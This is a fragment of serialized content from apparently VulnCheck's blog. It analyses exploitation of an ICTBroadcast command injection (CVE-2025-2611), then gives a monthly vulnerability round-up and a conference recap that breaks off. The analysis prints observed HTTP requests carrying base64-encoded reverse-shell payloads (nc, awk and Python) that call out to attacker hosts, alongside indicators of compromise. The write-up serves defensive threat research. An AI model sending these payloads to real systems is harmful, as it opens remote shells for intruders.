",[886,32322,32323],{},"mkfifo",[886,32325,30202],{},[1354,32327,32330],{"className":32328,"code":32329,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.1\nHost: \nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F17.4.1 Mobile\u002F15E148 Safari\u002F604.1\nCookie: BROADCAST=`echo${IFS}bWtmaWZvIC90bXAvcGZnbWd6OyBuYyA4NXNwOWJleGoubG9jYWx0by5uZXQgMjI1MiAwPC90bXAvcGZnbWd6IHwgL2Jpbi9zaCA+L3RtcC9wZmdtZ3ogMj4mMTsgcm0gL3RtcC9wZmdtZ3o=|base64${IFS}-d|sh`\n",[886,32331,32329],{"__ignoreMap":219},[18,32333,32334,32335,32338],{},"To ",[886,32336,32337],{},"awk","-based solutions:",[1354,32340,32343],{"className":32341,"code":32342,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.1\nHost: \nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F17.4.1 Mobile\u002F15E148 Safari\u002F604.1\nCookie: BROADCAST=`echo${IFS}YXdrICdCRUdJTntzPSIvaW5ldC90Y3AvMC8xNDMuNDcuNTMuMTA2LzIyNTIiO2Rve2lmKChzfCZnZXRsaW5lIGMpPD0wKWJyZWFrO2lmKGMpe3doaWxlKChjfCZnZXRsaW5lKT4wKXByaW50ICQwfCZzO2Nsb3NlKGMpfX0gd2hpbGUoYyE9ImV4aXQiKWNsb3NlKHMpfSc=|base64${IFS}-d|sh`\n",[886,32344,32342],{"__ignoreMap":219},[18,32346,32347,32348,32351],{},"And Python-based ",[886,32349,32350],{},"zlib"," compressed payloads:",[1354,32353,32356],{"className":32354,"code":32355,"language":1359,"meta":219},[1357],"GET \u002Flogin.php HTTP\u002F1.1\nHost: 13.201.61.210\nUser-Agent: Mozilla\u002F5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit\u002F605.1.15 (KHTML, like Gecko) Version\u002F17.4.1 Mobile\u002F15E148 Safari\u002F604.1\nCookie: BROADCAST=`echo${IFS}ZWNobyBleGVjXChfX2ltcG9ydF9fXChcJ3psaWJcJ1wpLmRlY29tcHJlc3NcKF9faW1wb3J0X19cKFwnYmFzZTY0XCdcKS5iNjRkZWNvZGVcKF9faW1wb3J0X19cKFwnY29kZWNzXCdcKS5nZXRlbmNvZGVyXChcJ3V0Zi04XCdcKVwoXCdlTnBOanN0T3d6QVFSZGYyVjJRWFd3U3JSRlJxa2J5b3FpQlZDS2hvOWxWaVQ5VzB4bU41SE9EemNXZ1dMTSs5Wng3RFo4Q1lDa0p6aFZSMFZCQWY1bWpzUTBRRFJGTWNPYUVtZGZNRXFjM3pjZmZXdEJXcHcvdjI1WGhvUDVyTnE4eVNNdWc5bUNSRXVWcFNXUGZ3YzFFT1RlY1NLZytwck9wNldVdkp2OCtEZzZLTkl6eHhabldlakdDK3hNT2lmcFNjRGFmQ2dSZFdhcjNJUGVzamRGZk9nbzVxajJGcWxBV0RGa1E1cHRQOXFwUVZuY0U1UFMyc0tObkJUK3B1MzB5QVkvcEhFT05NK1JEcW9HNUd2dDlaSWUvK09Ec3pjNVpmSS9CV29PUy81WVpoZWdcPVw9XCdcKVxbMFxdXClcKVwpIHwgZXhlYyAkKHdoaWNoIHB5dGhvbiB8fCB3aGljaCBweXRob24zIHx8IHdoaWNoIHB5dGhvbjIpIC0=|base64${IFS}-d|sh`\n",[886,32357,32355],{"__ignoreMap":219},[18,32359,32360,32361,32366,32367,13858,32369,32371,32372,32375,32376,32380,32381,32384],{},"The attacker used a ",[47,32362,32365],{"href":32363,"rel":32364},"https:\u002F\u002Flocaltonet.com\u002F",[51],"localto.net"," URL in the ",[886,32368,32323],{},[886,32370,30202],{}," payload, and also made connections to ",[886,32373,32374],{},"143.47.53.106"," in other payloads. Notably, these behaviors link the attacker to a campaign detailed by ",[47,32377,10492],{"href":32378,"rel":32379},"https:\u002F\u002Fwww.fortinet.com\u002Fblog\u002Fthreat-research\u002Fmultilayered-email-attack-how-a-pdf-invoice-and-geofencing-led-to-rat-malware",[51]," in May 2025 where both this IP address and ",[886,32382,32383],{},"localtonet.com"," were used.",[61,32386,32388],{"id":32387},"artifacts-and-indicators","Artifacts and Indicators",[18,32390,32391,32392,32395,32396,32399],{},"VulnCheck ",[47,32393,1245],{"href":1243,"rel":32394},[51]," customers have had access to Snort and Suricata detections since early August, while ",[47,32397,1251],{"href":1249,"rel":32398},[51]," customers have received data on the exposed ICTBroadcast systems during the same period.",[993,32401,32403],{"id":32402},"observed-ips","Observed IPs",[22,32405,32406,32411],{},[25,32407,32408],{},[886,32409,32410],{},"86.104.249.106",[25,32412,32413],{},[886,32414,32374],{},[993,32416,32418],{"id":32417},"observed-domain","Observed Domain",[22,32420,32421],{},[25,32422,32423],{},[886,32424,32425],{},"85sp9bexj.localto.net",[61,32427,202],{"id":201},[18,32429,29952,32430,1246,32433,1255,32436,59],{},[47,32431,30353],{"href":30351,"rel":32432},[51],[47,32434,30358],{"href":30356,"rel":32435},[51],[47,32437,32017],{"href":32015,"rel":32438},[51],[18,32440,1228,32441,1234,32444,1240,32447,1246,32450,1255,32453,1260],{},[47,32442,1233],{"href":10806,"rel":32443},[51],[47,32445,1239],{"href":1237,"rel":32446},[51],[47,32448,1245],{"href":1243,"rel":32449},[51],[47,32451,1251],{"href":1249,"rel":32452},[51],[47,32454,216],{"href":1258,"rel":32455},[51],{"title":219,"searchDepth":220,"depth":220,"links":32457},[32458,32459,32460,32464],{"id":11272,"depth":220,"text":11273},{"id":32289,"depth":220,"text":32290},{"id":32387,"depth":220,"text":32388,"children":32461},[32462,32463],{"id":32402,"depth":1266,"text":32403},{"id":32417,"depth":1266,"text":32418},{"id":201,"depth":220,"text":202},"2025-10-14","Attackers are abusing an unauthenticated command injection bug in ICTBroadcast (CVE-2025-2611) to execute remote commands and drop reverse shells. VulnCheck caught the exploitation, linked it to related research, and had detections available for customers well before the activity began.",{"slug":32468},"ictbroadcast-kev","\u002Fblog\u002Fictbroadcast-kev",{"title":24026,"description":32466},"blog\u002Fictbroadcast-kev",[2941,242,1281,23275,1279],"cSr76mrprozTt3Hc3P6W3Veg0H-mHGiG9Xzl_F-CSOc",{"id":32475,"title":30353,"articles":7,"authors":32476,"body":32478,"date":33010,"description":33011,"extension":234,"image":7,"link":7,"meta":33012,"navigation":237,"path":33014,"seo":33015,"series":7,"stem":33016,"subtype":7,"tags":33017,"__hash__":33018},"blog\u002Fblog\u002Foctober-2025-research-highlights.md",[32477],{"name":256,"link":258,"avatar":257,"linkName":29813},{"type":15,"value":32479,"toc":33001},[32480,32486,32499,32502,32506,32509,32513,32516,32677,32690,32713,32716,32720,32727,32733,32742,32745,32751,32782,32799,32812,32816,32823,32826,32851,32894,32905,32909,32915,32922,32925,32952,32966,32973,32975,32984],[18,32481,32482],{},[68,32483],{":width":10862,"alt":32484,"src":32485},"October Emerging Threats","\u002Fblog\u002Foctober-2025-research-highlights\u002Foctober-2025-emerging-threats.png",[18,32487,32488,32489,32494,32495,32498],{},"Welcome to VulnCheck’s NEW monthly research round-up! Our vulnerability intelligence, initial access intelligence, and CVE Numbering Authority (CNA) teams collectively evaluate and produce thousands of pieces of vulnerability and exploit intelligence a month. In the background, we’re also enhancing VulnCheck’s core products and shipping new ",[47,32490,32493],{"href":32491,"rel":32492},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-10-03#go-exploit-cache-adds-censys-platform-support",[51],"features"," for community resources like ",[47,32496,20558],{"href":14297,"rel":32497},[51],", our open-source exploit framework.",[18,32500,32501],{},"Staying on top of new vulnerabilities and threats is a Sisyphean task with increasingly high costs to teams and organizations. VulnCheck is committed to empowering the broader security community with best-in-class vulnerability and exploit data that’s well-vetted, machine-readable, and integration-ready out of the box. For more about us, visit vulncheck.com.",[61,32503,32505],{"id":32504},"the-stuff-you-couldnt-miss-recent-emerging-threats","The Stuff You Couldn’t Miss: Recent Emerging Threats",[18,32507,32508],{},"It’s easy for vulnerability news cycles to over-focus on zero-day flaws, but the past six weeks or so have seen some real bangers. If you’re a vulnerability responder who’s attuned to big swaths of enterprise software, you have our sympathy and respect for the last month and a half.",[993,32510,32512],{"id":32511},"recent-zero-day-vulnerabilities","Recent Zero-Day Vulnerabilities",[18,32514,32515],{},"Behold — a whole lot of classic initial access and extortion targets in one table, all exploited as zero-day and disclosed between the end of August and first few days of October. These weren’t the only 0days that hit the scene in September, but they were arguably the most impactful at scale.",[307,32517,32518,32536],{},[310,32519,32520],{},[313,32521,32522,32525,32528,32531,32533],{},[316,32523,32524],{},"Vulnerability",[316,32526,32527],{},"Impact",[316,32529,32530],{},"CVSS-B",[316,32532,328],{},[316,32534,32535],{},"Public PoC",[336,32537,32538,32559,32578,32604,32627,32649],{},[313,32539,32540,32548,32551,32554,32557],{},[341,32541,32542,32547],{},[47,32543,32546],{"href":32544,"rel":32545},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-7775",[51],"CVE-2025-7775",": Citrix NetScaler memory overflow",[341,32549,32550],{},"RCE",[341,32552,32553],{},"9.2",[341,32555,32556],{},"Unattributed",[341,32558,359],{},[313,32560,32561,32569,32571,32574,32576],{},[341,32562,32563,32568],{},[47,32564,32567],{"href":32565,"rel":32566},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-20352",[51],"CVE-2025-20352",": Cisco IOS and IOS XE stack-based buffer overflow",[341,32570,32550],{},[341,32572,32573],{},"7.7",[341,32575,32556],{},[341,32577,359],{},[313,32579,32580,32588,32590,32593,32601],{},[341,32581,32582,32587],{},[47,32583,32586],{"href":32584,"rel":32585},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-20333",[51],"CVE-2025-20333",": Cisco ASA and FTD classic buffer overflow",[341,32589,32550],{},[341,32591,32592],{},"9.9",[341,32594,32595,32596,2230],{},"UAT4356 (",[47,32597,32600],{"href":32598,"rel":32599},"https:\u002F\u002Fblog.talosintelligence.com\u002Farcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices\u002F",[51],"ArcaneDoor",[341,32602,32603],{},"Partial",[313,32605,32606,32614,32617,32620,32625],{},[341,32607,32608,32613],{},[47,32609,32612],{"href":32610,"rel":32611},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-20362",[51],"CVE-2025-20362",": Cisco ASA and FTD missing authorization",[341,32615,32616],{},"Auth bypass",[341,32618,32619],{},"6.5",[341,32621,32595,32622,2230],{},[47,32623,32600],{"href":32598,"rel":32624},[51],[341,32626,383],{},[313,32628,32629,32637,32639,32641,32647],{},[341,32630,32631,32636],{},[47,32632,32635],{"href":32633,"rel":32634},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-10035",[51],"CVE-2025-10035",": Fortra GoAnywhere MFT command injection",[341,32638,32550],{},[341,32640,24698],{},[341,32642,32643],{},[47,32644,941],{"href":32645,"rel":32646},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Fstorm-1175",[51],[341,32648,32603],{},[313,32650,32651,32659,32661,32663,32675],{},[341,32652,32653,32658],{},[47,32654,32657],{"href":32655,"rel":32656},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-61882",[51],"CVE-2025-61882",": Oracle E-Business Suite remote code execution",[341,32660,32550],{},[341,32662,3699],{},[341,32664,32665,1246,32670],{},[47,32666,32669],{"href":32667,"rel":32668},"https:\u002F\u002Fconsole.vulncheck.com\u002Fthreat-actor\u002Fta505",[51],"Graceful Spider",[47,32671,32674],{"href":32672,"rel":32673},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Fransomware?ransomware=Clop",[51],"Cl0p",[341,32676,383],{},[18,32678,32679,32680,32684,32685,59],{},"The top four vulnerabilities in the table above are thus far only known to be exploited in a limited fashion by adversaries. The last two are a different story: Exact details are still murky on ",[47,32681,32635],{"href":32682,"rel":32683},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fcve-2025-10035-fortra-go-anywhere-mft",[51],", a CVSS-10 vulnerability in Fortra file transfer software GoAnywhere MFT that VulnCheck and two other research teams came to similar conclusions upon analyzing: Exploitation didn’t appear to be possible without access to a private key. Initially VulnCheck’s research team thought it was possible that a weird internal developer bug of some sort accidentally got disclosed with a max-severity score (it happens!); then reports of zero-day exploitation started surfacing from sources who weren’t the vendor — one of which included ",[47,32686,32689],{"href":32687,"rel":32688},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2025\u002F10\u002F06\u002Finvestigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability\u002F",[51],"ransomware deployment",[18,32691,32692,32693,32698,32699,32703,32704,32707,32708,59],{},"Finally, as September came to a close, Oracle customers ",[47,32694,32697],{"href":32695,"rel":32696},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Foracle-e-business-suite-cve-2025-61882-exploited-in-extortion-attacks",[51],"began reporting extortion emails"," claiming to be from Cl0p (or ",[47,32700,32702],{"href":32672,"rel":32701},[51],"Clop","), a financially motivated threat group well-known for using complex exploit chains to access and exfiltrate large volumes of data from victim systems. Cl0p confirmed their involvement in a campaign they implied made use of one or more zero-day vulnerabilities; then, in a groan-inducing turn that many enterprise organizations probably wish they could have ignored, a rival threat group released the full exploit that Cl0p appears to have deployed in a large-scale attack dating back at least two months. The exploit leverages ",[47,32705,32657],{"href":32655,"rel":32706},[51],", a net-new zero-day vulnerability in Oracle E-Business Suite (EBS) that comprises at least four or five different weaknesses rather than being a single issue. Mass exploitation is ",[47,32709,32712],{"href":32710,"rel":32711},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fblog\u002Fcrowdstrike-identifies-campaign-targeting-oracle-e-business-suite-zero-day-CVE-2025-61882\u002F",[51],"now being reported",[18,32714,32715],{},"All of the CVEs above are on VulnCheck’s Known Exploited Vulnerabilities (KEV) list.",[61,32717,32719],{"id":32718},"notable-vulncheck-kev-additions","Notable VulnCheck KEV Additions",[18,32721,32722,32723,32726],{},"Speaking of KEV! ",[47,32724,1233],{"href":1231,"rel":32725},[51]," added 54 vulnerabilities in September 2025 after evidence of exploitation was published for the first time. Roughly 78% of these (42 CVEs) weren’t yet on CISA KEV as of October 2, 2025. We also incorporated an additional 47 CVEs into VulnCheck KEV based on historical evidence we discovered while researching older exploits and data sources.",[18,32728,32729],{},[68,32730],{":width":10862,"alt":32731,"src":32732},"VulnCheck KEV October","\u002Fblog\u002Foctober-2025-research-highlights\u002Fvulncheck-kev-oct-2025-additions.png",[18,32734,32735,32736,10515,32738,32741],{},"CISA added 16 CVEs to CISA KEV in September. Of these, 11 were added to VulnCheck KEV at least a day ahead of CISA KEV inclusion. ",[295,32737,31357],{},[47,32739,1233],{"href":1231,"rel":32740},[51]," is free and open to the security community.",[18,32743,32744],{},"While September was a busy month for emerging threats, read on for a few of our favorite recent KEV stories.",[18,32746,32747],{},[68,32748],{":width":10862,"alt":32749,"src":32750},"TP-Link Timeline","\u002Fblog\u002Foctober-2025-research-highlights\u002Ftp-link-timeline.png",[18,32752,32753,32766,32767,32772,32773,32778,32779],{},[295,32754,32755,32756,982,32761,4606],{},"TP-Link ",[47,32757,32760],{"href":32758,"rel":32759},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2023-50224",[51],"CVE-2023-50224",[47,32762,32765],{"href":32763,"rel":32764},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-9377",[51],"CVE-2025-9377"," After discussing TP-Link security over lunch with ",[47,32768,32771],{"href":32769,"rel":32770},"https:\u002F\u002Fx.com\u002Ftomlawrencetech",[51],"Tom Lawrence",", VulnCheck researcher Patrick Garrity started looking at old TP-Link advisories. In the process, he stumbled across historical exploitation evidence that tied two TP-Link vulnerabilities to the 7777 botnet — one of which (CVE-2023-50224) we added to VulnCheck KEV on August 21. The other vulnerability had no CVE when VulnCheck reviewed the evidence, but was assigned CVE-2025-9377 several days later. TP-Link ",[47,32774,32777],{"href":32775,"rel":32776},"https:\u002F\u002Fwww.tp-link.com\u002Fus\u002Fsupport\u002Ffaq\u002F4365\u002F",[51],"updated their advisory",", and both CVEs were added to CISA KEV on September 3. It’s unclear if that was a lucky coincidence or if VulnCheck’s KEV addition triggered new CISA and vendor awareness of vulnerabilities that were previously overlooked. ",[1131,32780,32781],{},"Ed: Patrick’s bet is on the latter!",[18,32783,32784,32792,32793,32798],{},[295,32785,32786,32787,4606],{},"Sitecore ",[47,32788,32791],{"href":32789,"rel":32790},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-53690",[51],"CVE-2025-53690"," On the surface, this is a deserialization vulnerability in Sitecore XM, XP, XC, and Managed Cloud deployments. Under the covers, it turns out that old (2017) Sitecore docs included a sample machine key for learning purposes, some Sitecore customers chose to use that key in production, and threat actors found out and exploited it. Mandiant has a ",[47,32794,32797],{"href":32795,"rel":32796},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fviewstate-deserialization-zero-day-vulnerability",[51],"write-up"," noting that despite the wildly insecure customer configuration choice, the unattributed threat actors had “deep understanding” of the compromised product.",[18,32800,32801,32802,32807,32808,32811],{},"Other notable additions include Cisco Small Business router ",[47,32803,32806],{"href":32804,"rel":32805},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2022-20705",[51],"CVE-2022-20705)","and Shenzhen Aitemi M300 ",[47,32809,24149],{"href":24147,"rel":32810},[51],", both of which had botnet activity observed in recent weeks and have exploits available for VulnCheck initial access intelligence customers.",[61,32813,32815],{"id":32814},"initial-access-intelligence-and-go-exploit-highlights","Initial access intelligence and go-exploit highlights",[18,32817,32818,32819,32822],{},"VulnCheck’s ",[47,32820,1245],{"href":1243,"rel":32821},[51]," team creates exploits, detections, queries, and more for vulnerabilities that can be used as initial access vectors. The team covered 25+ new CVEs over the past month, most of which include PCAPs, network rules, and ASM search engine queries for initial access customers.",[18,32824,32825],{},"In addition to signature and PCAP coverage for recent threats like Cisco ASA and Oracle EBS, our research team snuck in some interesting post-auth exploits in September. Those include:",[22,32827,32828,32842],{},[25,32829,32830,32831,982,32836,32841],{},"Original post-auth exploits for N-able N-central ",[47,32832,32835],{"href":32833,"rel":32834},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-8875",[51],"CVE-2025-8875",[47,32837,32840],{"href":32838,"rel":32839},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-8876",[51],"CVE-2025-8876",", both of which were added to CISA KEV as zero-days in August but had virtually no other information available. N-central is a remote monitoring and management (RMM) platform, a technology category that attackers are fond of abusing. Nearly two months post-disclosure, both FOFA and ZoomEye still show a few thousand internet-exposed instances of N-central, mostly in North America.",[25,32843,32844,32845,32850],{},"A weaponized exploit for ",[47,32846,32849],{"href":32847,"rel":32848},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-58443",[51],"CVE-2025-58443"," in FOG open-source cloning and inventory management software, which has a small internet footprint but is more often used internally for labs and other shared systems. The team’s exploit allows for unauthenticated database recovery and password hash access; the “shared system” deployment pattern also means that theoretically, there’s potential for wormability. CVE-2025-58443 isn't known to be exploited in the wild yet, but proof-of-concept exploit code is publicly available.",[18,32852,32853,32854,1246,32859,32864,32865,1246,32870,32875,32876,32881,32882,32887,32888,32893],{},"Other more traditional initial access exploit coverage was also released in September for ",[47,32855,32858],{"href":32856,"rel":32857},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-09-19#cve-2025-57819-freepbx-endpoint-manager-authentication-bypass-to-sql-injection-rce",[51],"FreePBX",[47,32860,32863],{"href":32861,"rel":32862},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-09-19#cve-2025-5095-burk-technology-arc-solo-authentication-bypass-admin-password-reset",[51],"Burk Technology ARC Solo"," ICS devices, generative AI platform ",[47,32866,32869],{"href":32867,"rel":32868},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-09-26#cve-2025-58434-flowiseai-flowise-password-reset-token-account-takeover",[51],"Flowise",[47,32871,32874],{"href":32872,"rel":32873},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-09-05#cve-2024-51092-librenms-hostname-command-injection",[51],"LibreNMS",", and a quartet of Fortinet FortiSIEM ",[47,32877,32880],{"href":32878,"rel":32879},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-10-03#cve-2024-23109-fortinet-fortisiem-command-injection",[51],"command injection vulnerabilities",", to name just a few. Customers interested in the Cisco ASA and ASDM ecosystem might also be interested in ",[47,32883,32886],{"href":32884,"rel":32885},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-10-03#cve-2021-1585-cisco-asdm-launcher-rce-via-malicious-software-package-download",[51],"a recent exploit"," the team added for Cisco ASDM ",[47,32889,32892],{"href":32890,"rel":32891},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2021-1585",[51],"CVE-2021-1585",", a well-known RCE vulnerability still present in the latest version of the ASDM launcher.",[18,32895,32896,32897,32901,32902,59],{},"Want to follow along with initial access exploits and vulnerabilities? Check out the team’s weekly threat-oriented ",[47,32898,14853],{"href":32899,"rel":32900},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access",[51]," or learn more ",[47,32903,305],{"href":1243,"rel":32904},[51],[61,32906,32908],{"id":32907},"vulncheck-cna-issuing-cves-to-surface-hidden-risk","VulnCheck CNA: Issuing CVEs to Surface Hidden Risk",[18,32910,32911],{},[68,32912],{":width":10862,"alt":32913,"src":32914},"VulnCheck CNA October","\u002Fblog\u002Foctober-2025-research-highlights\u002Fvulncheck-cna-activity.png",[18,32916,32917,32918,32921],{},"As one of the CVE world’s major research CNAs, VulnCheck ",[295,32919,32920],{},"assigned 60 new CVEs"," in September for vulnerabilities that were either reported to us by third-party researchers or discovered in our team’s analysis of exploited, weaponized, or otherwise-public vulnerabilities without CVE identifiers.",[18,32923,32924],{},"Of those 60 new CVE assignments:",[22,32926,32927,32935,32938],{},[25,32928,32929,32930,32934],{},"55 came through external security researchers who engaged VulnCheck CNA’s “",[47,32931,32933],{"href":2999,"rel":32932},[51],"Report a Vulnerability","” service that conducts coordinated vulnerability disclosure (CVD) outreach with vendors on behalf of researchers.",[25,32936,32937],{},"15 were issues with public exploit code but no known CVE identifier (some of these also came from external researcher observations, hence the overlap).",[25,32939,32940,32941,982,32946,32951],{},"Two vulnerabilities (",[47,32942,32945],{"href":32943,"rel":32944},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2022-4980",[51],"CVE-2022-4980",[47,32947,32950],{"href":32948,"rel":32949},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2024-13990",[51],"CVE-2024-13990",") had exploitation evidence from 2022 and 2024, respectively — but did not have CVEs.",[18,32953,32954,32955,32960,32961,59],{},"VulnCheck has dozens of coordinated vulnerability disclosure (CVD) projects in flight at any given time for vulnerabilities reported to us by community researchers. Recent community research disclosures reported through VulnCheck CNA have included multiple vulnerabilities in Netgate pfSense (via Alex Williams of Pellera Technologies) and a slew of Vasion Print (formerly PrinterLogic) CVEs as a result of ",[47,32956,32959],{"href":32957,"rel":32958},"https:\u002F\u002Fpierrekim.github.io\u002Fblog\u002F2025-04-08-vasion-printerlogic-83-vulnerabilities.html",[51],"a beast-mode research report"," by Pierre Barre. You can see all VulnCheck ",[47,32962,32965],{"href":32963,"rel":32964},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories",[51],"vulnerability advisories here",[18,32967,32968,32969,32972],{},"Have a vulnerability you’re looking to disclose? ",[47,32970,31521],{"href":2999,"rel":32971},[51]," and we’ll handle disclosure coordination on your behalf! You get the credit, we do the software supplier outreach. Huge thanks to the research community for their help and input on vendor coordination and timely CVE assignment!",[61,32974,202],{"id":201},[18,32976,32977,32978,982,32981,59],{},"The VulnCheck research team is always on the lookout for new attack vectors and notable attacker behavior. For more research like this, see ",[47,32979,31532],{"href":31530,"rel":32980},[51],[47,32982,31540],{"href":31538,"rel":32983},[51],[18,32985,1228,32986,1234,32989,1240,32992,1246,32995,1255,32998,1260],{},[47,32987,1233],{"href":10806,"rel":32988},[51],[47,32990,1239],{"href":1237,"rel":32991},[51],[47,32993,1245],{"href":1243,"rel":32994},[51],[47,32996,1251],{"href":1249,"rel":32997},[51],[47,32999,216],{"href":1258,"rel":33000},[51],{"title":219,"searchDepth":220,"depth":220,"links":33002},[33003,33006,33007,33008,33009],{"id":32504,"depth":220,"text":32505,"children":33004},[33005],{"id":32511,"depth":1266,"text":32512},{"id":32718,"depth":220,"text":32719},{"id":32814,"depth":220,"text":32815},{"id":32907,"depth":220,"text":32908},{"id":201,"depth":220,"text":202},"2025-10-09","Insights on recent emerging threats, initial access vulnerabilities, and published CVEs from VulnCheck’s research teams",{"slug":33013},"october-2025-research-highlights","\u002Fblog\u002Foctober-2025-research-highlights",{"title":30353,"description":33011},"blog\u002Foctober-2025-research-highlights",[242,1281,1279,1280],"eR8sSoo0Hdy_HW54K_8q6mZi132SAzfliA75IEOvpmI",{"id":33020,"title":33021,"articles":33022,"authors":33023,"body":33026,"date":33165,"description":33166,"extension":234,"image":7,"link":7,"meta":33167,"navigation":237,"path":33169,"seo":33170,"series":7,"stem":33171,"subtype":7,"tags":33172,"__hash__":33174},"blog\u002Fblog\u002F2025-threatcon1-recap.md","THREATCON1 2025 Recap: A New Standard for Cybersecurity Events",[],[33024],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},"https:\u002F\u002Ftwitter.com\u002Ftmbainjr1",{"type":15,"value":33027,"toc":33157},[33028,33035,33038,33041,33044,33047,33051,33054,33060,33063,33067,33070,33073,33076,33079,33083,33086,33089,33092,33098,33102,33131,33134,33138,33141,33144,33148,33151,33154],[18,33029,33030,33031,59],{},"There’s something really special about running your own event. Not only do you have the opportunity to bring people together with a shared common goal, but it gives you the opportunity to shape an event that becomes part of your brand, and a movement, not necessarily just an event. I’m talking about ",[47,33032,33034],{"href":32146,"rel":33033},[51],"THREATCON1 2025",[18,33036,33037],{},"I’m not big on quoting people to make a point, but in the words of Ralph Waldo Emerson, “ Do not go where the path may lead, go instead where there is no path and leave a trail.” This is particularly applicable as VulnCheck’s growth strategy is rooted in the concept of “playing bigger.”",[18,33039,33040],{},"What is remarkable to me as the Marketing lead at VulnCheck is we don’t have hundreds of people at the company, and we’re a Marketing team of four people. We pulled off what I like to think of as something nearly impossible to execute as a small team.",[18,33042,33043],{},"However, there’s something about a huge challenge - one that suggests, “this is too much to take on” that we didn’t balk at, approached it intelligently without striving for perfection and the entire VulnCheck organization pitched in to support THREATCON1.",[18,33045,33046],{},"VulnCheck’s THREATCON1 was a massive success for many reasons. This is an attempt to highlight the key elements that helped us build an event that is now our flagship experience that will only grow after its first year.",[61,33048,33050],{"id":33049},"threatcon1-keynote","THREATCON1 Keynote",[18,33052,33053],{},"I personally had the privilege of moderating an important discussion between Jen Easterly, former Director of CISA, and Andrew Boyd, former Head of the Center for Cyber Intelligence at the CIA. We selected both speakers based on their deep cyber backgrounds in defensive and offensive cyber respectively.",[18,33055,33056],{},[68,33057],{"alt":33058,"src":33059,"width":28205},"Keynote Presentation From THREATCON1","\u002Fblog\u002F2025-threatcon1-recap\u002FIMG_3033.jpg",[18,33061,33062],{},"All I can say is this was one of the more enlightening and eye-opening sessions I’ve ever witnessed, not to mention participate in. And what made it special was getting to know Jen and Andy - knowing they are just both super cool humans with knowledge and experience that is as impressive as it is inspiring.",[61,33064,33066],{"id":33065},"who-attended-and-participated","Who Attended and Participated",[18,33068,33069],{},"We had nearly 400 registrants and hundreds of attendees at THREATCON1, which is an amazing response for a first-year event. Titles ranged from CISOs to threat intelligence analysts to vulnerability management practitioners to security researchers and go-to-market teams. The cross-section of leaders and newcomers across different domains in cyber meant that there was relevant content and purpose for attending.",[18,33071,33072],{},"THREATCON1 also featured 17 VulnCheck customers who attended the conference across its diverse installed base: Enterprise, Federal, Cybersecurity companies and cyber insurers. It sure makes life easier when customers are supporting an initiative like this. I would have been happy with five coming, but 17 was next-level!",[18,33074,33075],{},"Overall we had 34 presenters at the conference also, running two separate tracks: our Tech Track and our Showcase Track. We covered topics all relating to identifying, understanding and countering emerging threats. If you missed THREATCON1, we will have our resource center live very soon to view all our amazing content.",[18,33077,33078],{},"We also had seven sponsors of THREATCON1: Carahsoft, RunSafe Security, NetRise, HeroDevs, FleetDM, Blackwire Labs and Cogent Security. All participated at the highest level in terms of presentations and networking. THREATCON1 doesn’t happen without sponsor support. Taking a flyer on sponsoring a first-year event isn’t the easiest decision in any business, and VulnCheck is appreciative of their support across the board.",[61,33080,33082],{"id":33081},"our-partners","Our Partners",[18,33084,33085],{},"I’ll first say that as we hosted this event at the Carahsoft global headquarters, THREATECON1 doesn’t happen without Carahsoft. First, they’re an incredible business partner to VulnCheck with deep expertise in navigating the Federal market and who have helped us push VulnCheck intelligence into Federal sites and systems. It's not lost on me that it can be challenging for well-established teams to entertain the notion of an early-stage startup bringing the next big thing in cyber to teams who rely on them as trusted technology advisors.",[18,33087,33088],{},"However, it's not limited to just that - the Carahsoft Marketing team, their facilities team and their A\u002FV specialists helped us create an experience with THREATCON1 that hopefully will remain top-of-mind for years to come as 